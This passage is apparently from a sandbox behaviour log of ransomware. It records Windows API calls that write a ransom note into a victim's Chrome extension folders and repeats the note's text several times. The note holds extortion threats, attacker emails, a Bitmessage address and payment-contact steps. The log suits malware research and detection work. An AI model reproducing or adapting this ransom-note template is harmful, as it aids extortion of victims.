broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.368] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.369] CloseHandle (hObject=0x294) returned 1 [0273.369] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0273.369] GetLastError () returned 0x2 [0273.369] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique 